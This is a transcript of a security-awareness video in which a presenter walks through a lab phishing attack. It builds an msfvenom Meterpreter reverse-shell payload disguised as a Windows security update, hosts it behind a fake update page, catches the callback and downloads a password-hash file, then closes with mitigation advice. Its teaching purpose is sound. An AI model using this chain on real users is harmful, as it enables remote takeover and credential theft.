All right. So I'm still trying to get used to this OBS studio thing. And typically, I don't make videos live, obviously. So, hey everyone, once again, Rick here from Port Zero. So we're doing another video. This one's going to be live. Um, you've seen a collection of my videos so far, utilizing different tools, MSF console with Meterpreter and in its exploit multi-handler and stuff like that. So um, one of the things, so what I want to focus on today, so once again, my big thing is education, right? Education and awareness, making sure that people are safe in their environment, whenever they log onto the internet, whenever they get in the email, whenever they, whatever it may be. I'm trying to educate people on how they can be safe doing it. So, in one way, I love to do this is because once again, kind of like in my video I just put up yesterday, um, one of the things I like to do is show people how the sausage is made. So I kind of I get to ask that question quite a bit. Is Rick, hey, look, I know it's bad to click on this, and I know I shouldn't do that, but why is that? Like, what happens behind the scenes? What will happen ultimately? Um, if somebody gets a hold of my desktop, or if they get a hold of some files that I have, if I click on this link, or if I click on this call to action button, or if I open this attachment or whatnot, what really happens? So that's why I kind of like to go a little bit behind the scenes to kind of show people, like, hey, look, you click on this, or you do this, you open up this attachment, this is what can happen. So if it's almost like a win-win situation for me, because if what I'm doing is having somebody or giving somebody pause before they click on that link, or they open up that attachment, or if it's just showing somebody, hey, look, before you click on this, hover over this link or this call to action button and look down the bottom left hand screen, or the corner of your screen, or right hand corner, wherever it's going to come up at. Like on mine in the demo, it's probably going to come up in the bottom left hand corner, but it's going to show you the actual URL, or the website it's going to go to. For those that don't know, URL, Uniform Resource Locator, which is otherwise known as your website, where it's going to actually direct you if you do click on that link or that call to action button or whatnot. So, so today what we're going to do is we're going to get into a fake Windows software update. So those are pretty prevalent. You don't typically see them come in your email, however they do. You typically see those, like, say, if you get like adware or scareware in your computer, and you start getting all those pop-ups, and it says, hey, we think um, your your um, your device is infected. Go ahead, click on here to install or update your software, or update your security software or whatnot. Well, in this instance, what we're going to do is this one's going to be through simulated email. So everything we're doing is in a simulated environment. It's in a virtual environment. It's in the port zero .local direct environment. So in the domain. So what we have is going to be once again, our Windows 11 victim machine, and we're going to have our Kali Linux attacker. So this is happening in a controlled environment. So once again, this is for educational purposes. So what we're going to do is I'm going to show you kind of how the sausage is made for simulation purposes, and then we're going to execute this, and we're going to see what we can be able to pull from the victim machine once we get that callback or that reverse TCP shell interpreter session. So let me go ahead and share my screen real fast. All right, here we go. Right here is on the left side, I like to do the split screen. So on the left side is my Kali machine, and on the right side is my victim Windows 11. And some of this stuff I've already built because, in this internal domain, I don't want to go ahead and set up an email to where I'm actually sending the email and all that. So what we're going to do is I did a pre template, email template. It's in right now. It's in text. So so whether you're um, following along with this or trying to figure out how you can do this in your environment to be able to simulate this. So basically, I have a HTML script that I have inside of a text file, and we're going to show you how to convert this to HTML. So, and you'll be able to understand what I'm talking about once we do the redirect to simulate what's coming from our email. Okay, so the premise of this is threat actor sends you an email or sends the victim an email. Inside the email is a call to action button saying, hey, you need to update your software. And then what we're going to do is the victim's going to click on the update, and it's going to when they click on that, it's going to direct them to an Apache 2 server that's being hosted by the threat actor and to a web page that's going to say, hey, you need to update your Windows software, so click here. And then from there, once they click on that, that's going to um, transfer our MSFM payload that we're going to create in our attacker machine right here in our Kali. That's going to be Windows Security Update.exe. So, and we'll be able to see once we get a session. So right here, what we have on our victim machine, this is our text file of our HTML. So we're going to convert this to, this is just simulating the email we're going to open. So if you can see, we've got this already typed up. It's our dear user, your system's vulnerable, and you'll be able to see this more clearly when we convert this. So we're going to do a file, save as. So if you want to follow along at home and you're trying to build this for a simulated environment. So we're going to convert that to all files on our desktop. For our file name, it's going to be here, but we're going to take out the text at the end. And make sure that whatever you name it, it's going to be a .html. So, and then make sure it's UTF-8 and save. All right, as you can see, we now have an HTML right here. And if we open that up, so now we've created that email in our environment. So let's just pretend you just opened up your Gmail and this is what you see. Important security update, action required. Dear user, your system is vulnerable to a recently discovered Windows security threat. It also actually has a security patch, so it kind of looks legit. And it's telling you need to download this immediately. So this is totally social engineering. They're trying to prompt your emotion to be able to click this, like clickbait, update now, right? And then, so we open up that email, we hover over update now. If you look down at the bottom of the screen, it has our the URL it's going to go to. So it's going to be our attacker IP, the .101/index1.html. So let's come back. So we've already done that on the victim machine. Like I said, this is supposedly like we've already sent them an email, right? So let's close this out real fast. We're going to come and we're going to set everything up from our Kali. So we're going to have two terminals open. So right here we're going to set up a new tab. And then we're going to open this and rename this. Since this is being web hosted, so we're going to set up an Apache 2. So we'll name that Apache 2. Come back to our working directory. So now what we want to do is the first thing we have to create that MSF Venom payload to be able to use, to be able to get our interpreter session and to be able to pull, so that way we can create our executable for our Windows machine. So we're going to do an MSF Venom with a payload. So that payload, it's going to be our Windows interpreter reverse TCP with an L host of our IP, our attacker IP, 192.168. How about we put an equals in there? So these things are raw, so sometimes I'll omit some of this stuff. 227. 101, and then L port equals 4444. And then we're going to do a file, which is going to be a Windows file, so it's going to be an executable. Remember, if it was a Linux file, it would be an ELF file. And then what we're going to do is, let's out this to, this is going to be named Windows Security Update.exe. So we're creating our payload so that way we can get this session going, or this will be transferred over to our victim when they click on our Apache server. So, but once we create this, we're going to move this over to our var www.html directory. So that's creating that. As you see, it created an executable file with 73,802 bytes. So let's do a sudo move Windows Security Update.exe to our var www.html. Windows Security Update. Sudo move. Oh, Windows. How about we do that? Windows Security Update. See? .exe to our www HTML folder. There we go. So if we want a CD to there and see, make sure it made it in there. And there it is, our Windows Security Update, our executable. Okay, that's our MSF Venom payload that we'll be setting up. Also, we want to be able to set up our the face of our web page that we want them to be able to come into. So we've built that on here. So let's do a sudo nano index1.html. So this here is what basically what they're what we created. So this is the HTML file. So when the victim goes to log in or goes to click on the Windows update that we send them in the email, it's going to be coming through the web server into this HTML, this web page. So critical update required, Windows security updates out of date. To continue browsing securely, install the latest Windows security update. It's going to reference our Windows security update.exe file, which is our malicious payload. And then our call to action, our update now button. Okay. So that has already been created. It's already in our HTML or www.html directory. So let's get out of here. CD, clear. Okay, so now what we want to do is we want to set up that that MSF console. So let's go back to there. So once again, kind of like in our previous video, we're going to use our multi-handler exploit. So once we get our MSF6 prompt, so remember, you know, this whole the premise of this whole thing is kind of show people like what happens when you click on this, and this is what it looks like behind the scenes. So let me come back over to our Apache, and we need to actually start our Apache server. So let's do that while we're waiting on that. Sudo system control start Apache 2. All right, so if we want to make sure that it is running, let's do a sudo system control, and we'll do a status. Look at that, our web server is running. Cool, so we got to get that Apache 2 going before we can get all this up. Okay, so now we're going to use our multi-handler. So use exploit multi-handler. Okay, set payload. It's going to be Windows interpreter reverse TCP. There we go. Set L host be us 192.168.227.101. Set L port 4444. Okay, and then we can do an exploit. So it should be setting up this this callback here. There we go. Start a reverse TCP handler on our attacker IP with port 4444. Okay, and remember that's the same stuff that we put into our payload. So that way, when the victim does click on that and they get the Windows Security Update executable, inside of that payload is the stuff we configured, which is to be able to call back to our IP address and the port number. So, all right, so now on our screen, we've got our attacker, all this stuff is set up. Now we need to come over here to our victim machine. So basically, once again, let's just assume that, or let's just say we've already sent the victim our IP address, or I'm sorry, we sent them an email and they've now opened up their Gmail or whatever mail that they have. So on the right side of the screen here, this here is, let me pull this back up. All right, so this is what they see in their email. They say, hey, look, we got an important update. So we're going to go ahead and click on that, the update. As you can see, it came over to the inside of that email was our configured Kelly IP along with our index1.html. This is the web page that we created. We know that the Apache server is good to go now because it was able to be able to pull the index1.html. So now be like, okay, look, here's our Windows security updates out of date. Continue browsing securely. Install the latest security update. So once again, we hover over update now. And as a threat actor, you're hoping that you missed the security awareness training for your organization, or you just haven't, you're doing your due diligence. So down the bottom left, you can see where this is going to go. So 192.168.227.101/Windows Security Update.exe. So when we click on this, this is now going to try and pull that executable over to our machine. Now, we clicked update. We're going to start to get a download. And if Windows is doing its job, Windows Defender, we should be able to get like a, hey, you might not want to open this. All right, so here you can see it says Microsoft Defender Smart Screen was not able to scan Windows Update 2. You shouldn't keep it unless you're sure it's safe. Now, little caveat here. Windows, and I believe I mentioned in one of my previous videos, Windows Defender is probably one of the better security systems out there for your computer. So we're hoping as the threat actor that the person opening this maybe they have an old Windows operating system where it's not running Defender and it's not fully patched and it's not on continuous update. So with this, for this demo, just to let you know, since this is a Windows 11, I had to go ahead and disable the firewall and the Windows Defender products that are inside of it. So in order for this to be able to run. So, but as a threat actor, you're kind of hoping that either one, somebody's not running Windows Defender, or two, maybe that they disabled Windows Defender because they bought a proprietary third-party antivirus, such as like Norton, Kaspersky, or anything else like that. And maybe those things have not been doing their due diligence in updating threat signatures and stuff like that. So we're hoping that this goes. So, but if you're running Windows Defender, none of this should be popping up. But in this case, we're going to assume that the victim is running some unsafe type environment. So um, let's go ahead and click on this. Let's keep, and we'll hit open file. We get publisher verified. So once again, so social engineering is great too, and then you can use different layers of social engineering. So we started with the email, right? And if we know the threat actor is, they sent this to maybe a specific person, now they can actually call the person and be like, hey, this is this is the SOC, or this is the help desk, and or whatnot, maybe a position of security authority, IT authority, and say, look, I sent you an email. I need you to click on this, and when it does, I need you to click through these prompts. So once again, now the threat actor could be walking you through the bypasses on this. So once again, we'll go ahead and hit run. Once I hit run, let's take a look at the left side of my screen, which is going to be the threat actor screen. Look at that. So now what we've got is, and even when, as a victim, if I wanted to click out of um, my edge, right? So that HTML based that, or the website, guess what? The executable has already been downloaded. The callback has already been established, and now I've got a interpreter session on my victim machine. So as the threat actor, one of the first things I might want to do is find out where I'm at. So I want to be able to start doing some discovery of where did this land me right now. So my print working directory, right now it landed me on administrator and their downloads. So let's go back one, and we'll do directory. And once again, like you saw in the previous videos, we can go ahead and start moving through this owner's directory, which is our administrator. So just to kind of show everybody that we do have a connection. So on here on the victim machine, you can see we have some stuff. We've got a file called stuff. We've got our HTML that we made, and we've got our text file. So let's do a CD to the desktop, and we'll do a directory. And we've got a folder called stuff. So we'll CD to stuff, directory. And look at that. We've got some nuggets in there. We've got some text files. So what kind of stands out is, do we want to look at a holiday schedule? Maybe, maybe not. Onboarding checklist. We've got a users.txt, and we've got a password hashes. Why these things are kept on somebody's desktop, I don't know. But hey, let's check it out. So as you can see, we do have a connection because I can pull them from my machine, from the victim machine. So we can do a couple things here. I can either try to read the text files on screen, on my screen, or I can actually take those files and basically do a download onto my threat actor machine, and I can save them to wherever I want. So once again, kind of going back, this is once again just showing how the sausage is made for those who maybe clicked on something that they shouldn't have, and this is what can potentially happen in the background. So also too, for those other than just for security awareness, if I really wanted to, I could put a shell. So I could type in shell, right, and hit enter, and it would look like I was just in the command line of here. So for those that don't know, or maybe new to this stuff. However, I want to be able to stay on, kind of float my way through the directories using the interpreter session versus trying to get a shell. And one of the reasons for that is because the interpreter is a little bit more quiet. And if I do a shell, it's going to create a process, whether it be under cmd.exe along with its child processes, or PowerShell. So just kind of give you that look. I hit shell, and look at that. It says process 6184 created. So although if you're doing monitoring, or if you're having somebody monitor, maybe I did some obfuscation of my payload when I send it. Maybe I manipulated the shell code within inside of that, maybe put some padding in there to obfuscate, to be able to bypass, do some AV bypass or antivirus bypass. Um, and I was able to get a session. Um, what the organization could be alerted to is maybe they have alerts set up for any unfamiliar process creations. So right here, we've got process 6184 was created because I decided to use the shell into their environment. So once again, that's a little bit loud. So if somebody's doing some good monitoring, they can see that a process was spawned and then whatever other child processes from there. So it may not be the best approach, especially if you're trying to be stealthy. But anyway, so let's exit out of. Let's go back into. But as you can see on here, it's just like if we were in the command line. So let's exit out of there, and we'll go back to our interpreter session. Um, let's pretend we didn't create the shell. So, but if I was running my my Waza or my Waza, I'd be able to see that come up in any other child processes that were being spawned. So if I was being alerted to it. So anyway, so what we'll do is we're in the stuff, we're on our directory. So um, let's check out. So we'll kind of show you how the threat actor can actually read stuff is in the terminal. We can read it from the terminal. So maybe we want to do, oh, and also remember too, since we're on Meterpreter, we're running from a Linux machine. So our commands, for the most part, will still need to be Linux. So if I was to run the shell and I want to be able to read one of the files, I could do type or I could write more as my executable command. However, in the Meterpreter session, since it's the Linux, those aren't going to work. So I'm going to do a cat. And then I'll do users.text. And look at that. So now on our screen, we've got user 1 with a hash, user 2 with a hash, user 3 with a hash. So it's going to print it right there on my interpreter screen. So, and then, but one of the better things that we can do is, since we have this callback and we have this communication channel, and remember, this is a direct channel, right? So this is directly. So if anybody's logging this, they know that the 192.168.227.101, that should be coming up if it's being logged in their SIM, that where this callback was coming from. So I didn't set up any redirectors. I didn't use Sliver as a C2. I didn't use ngrok to have everything come back or be redirected back to my host machine. I didn't set up any other, I didn't proxy chain this. So, so as you can see, I have a clean desktop on my attacker machine. So one thing we can do is, and this may be news to a lot of new people out there for, who don't understand, like, hey, what can attacker do? So I have these files. Right now I'm in the administrator desktop stuff folder. So now what I can do is I can take, say, password hashes, right? So let's do download. I'm going to slide this over real quick because you're about to see that that's going to pop up. So download, and we'll do password hashes.txt, and we're going to put that on our desktop. So you're going to see that password hash is created. So let's do home, Kali, desktop. Look at that, download complete. So we just transferred that file. And I'll open it up. Now we have that. And if we come over here, for those that might be non-believers, we'll do password hashes.txt. Look at that, same exact file. So we did a file transfer, downloaded it from the victim machine back to us. Now, what can we do with this? Well, since this is an administrator machine, maybe they're keeping hashes on here, and now I can go to work offline. And if you think back to one of my previous videos of hash cracking with John the Ripper, we can open up John and start running hash cracking from there. So, and maybe since we also have users, maybe we want to download the users.txt. The users for this organization here is user 1, user 2, user 3. Not real, it's just set up, but it's for education purposes. So we can do a download. Now we'll do users.txt, same place, home, Cali, desktop. And there it is. There's our users file. So the same thing we just read here in our interpreter session, we just pulled it up and transferred that from the victim machine back to our attack machine. So once again, these videos, if you haven't noticed, they're kind of going a little bit in sequence. We've kind of taken tools. That's why I kind of did those up front. So that way, as we progress further on to show for security awareness of what goes on behind the scenes, why you shouldn't open links that are emailed to you, especially when it's calling for a sense of urgency for a Windows update. You should never have to do a Windows update from an email link to be able to go to an external site. Okay, so kind of the cool things here, some takeaways. Here's our session. We're going to go ahead and exit the session. And actually, since we have the session open, if we wanted to, we could try to traverse. I don't have my domain controller open right now, but if maybe in other videos, what we'll do is we'll focus on some privilege escalation, get system, try to do hash dumps and stuff like that to kind of show people like this stuff happens and this is how it happens. And like I said, this is for educational. This is in a controlled environment. So please don't go out there and just start taking this stuff and doing your reconnaissance going all the way through this. So basically what we showed here is we did our, kind of went through our cyber kill chain a little bit. We did our weaponization. We did our mock delivery through email. We exploited utilizing, we sent our exploit. We did our post exploitation. We did data exfiltration. So, and we were able to, so since we have that downloaded executable on there, this is our interpreter in our Metasploit is considered a C2 console as well. So we do have a little bit of persistence here. As long as, and once again, kind of taken away is as long as we don't create a shell, we may be able to maintain a little bit of quietness inside of this environment. So in a demonstration, so what we did is we showed how we seemingly some urgent software update, we're able to trick the user into installing malware on the device. So once again, always think before you click. Remember Rick said that. The email, it looks legit, references a fake security update, and it mimics, so it took you to a site that mimics like maybe, hey, maybe this is legit, right? To a Microsoft update portal. The only thing, so since this is in a controlled environment, I don't have it exposed to the internet, so I didn't have an actual Microsoft logo that attached to that. Since this doesn't reach out to the internet, it wasn't able to pull that from the Wikipedia page that I was going to look to be able to extract that inside of my HTML text. So some mitigating measures. So how can we mitigate this? So as a user, it's not, if you have this, if you're in an enterprise environment, God willing, I'm hoping that all of, especially if you're using Windows, that all your stuff's patched. You have it on recurring update. You're patching these things as Windows comes out. If you're using Windows Defender in there, that the signatures, Windows is really good. Defender is really good about updating signatures. So hopefully you have your environment set to where users cannot download executables. If they are able to, that it's automatically going to alert, maybe shut it off, benign that thing until we can figure it out. So always verify the source of your software updates. Use official channels, like I said. On your computer, down in the bottom right on your system tray, you should have if it's time for, it's like Patch Tuesday, if you get an update, like I got updates back on Tuesday, you should have the little orange triangle, and it comes up and says, with the little arrows around it, and it says, hey, Windows update, especially if you have it on automatic updates, and your computer will update and restart. So you shouldn't have to go to any website to update your stuff. So another takeaway: hover over your links, or hover over the link, hover over your call to action buttons. Look at the bottom of your screen, find out exactly where that URL or that website is taking you. And if you're unsure about it, report it to your security team, your IT team. If you're working in a work environment, if you're working at home and you don't feel confident, then just delete it. Make that phone call to somebody, or if it's somebody that maybe forwarded it to you, or if it's once again, you're not going to be redirected to a URL to update your stuff. So just delete it. It's not good. When in doubt, delete it. But if you're good, if you're confident, you could right click on it, copy the link, move it over to say virus total, URL scan, stuff like that. So, and then it will kind of give you that reputation rating, or it'll tell you whether or not the stuff is legit or not. So use endpoint protection. If you've got Windows 10 or 11, Windows 10 is about to be obsolete come this October. So you might want to update your device to Windows 11, which is free, by the way. If you're doing the Home Edition, I'm not 100% sure about the Pro, but if you've got the Home Edition, that'll be free. So my device, or my home device, was Windows 10, but I upgraded to Windows 11. But Windows Defender, if you're not using Windows Defender, at least use a good antivirus out there that's going to be able to help protect you from attacks like this. If you are in a work environment, train your employees regularly. Do the phishing emails. Educate them on stuff like this. Like, you may not need to go to the meat and potatoes like I'm doing to show you how the sausage is made and going behind the scenes. But I'm a very curious person when it comes to stuff like this. Like, how does that happen, right? Going back to my video, Who Am I, yesterday, back in 2014, I get hit personally with ransomware. So ever since then, I'm always like, how did that happen, right? So, just be skeptical. The biggest, one of your biggest defenses is awareness and user skepticism. That's like the first line of defense. If it doesn't, it's like that gut feeling, right? If it doesn't feel right, it probably isn't. So if you're unsure about it, don't click on it. Don't open it, whatnot. So, but anyway, I just wanted to show you. So make this a little bit more personal. So what we want to do is just kind of social engineering. It can bypass even the most technical stuff. So if you got threat actors, they can combine the social engineering between sending out an email, or send the email and then on top of that, like, contact you and say, hey, this is Microsoft, or hey, this is if you're working in a work environment, hey, this is the help desk. I need you. I'm going to walk you through these prompts, so that way they can help you bypass some of these administrative actions to be able to execute and download this stuff. So fake updates, they're real world attacks. They are used by ransomware groups and APTs. So just want to kind of show you out there that this stuff is real, and this is what happens. So hopefully you get something out of this. Hopefully this worked for a live stream. If it didn't, please let me know. If you didn't hear it, please let me know. I'll probably end up watching the playback to figure this out. But it is my first live stream with a on screen. So once again, comment, share, let me know what else you want to see, and that's about it. So I'm going to go ahead and break everything down from here. All right, thanks for watching. Once again, if you want to contact me, rgkelly@portzerocyber.com. I'm on LinkedIn, Richard/Rick Kelly. You can find me on there, or you can go to our website, portzerocyber.com. So for any type of user awareness or incident response planning. So hopefully, like I said, you got something out of this, and thanks for watching. And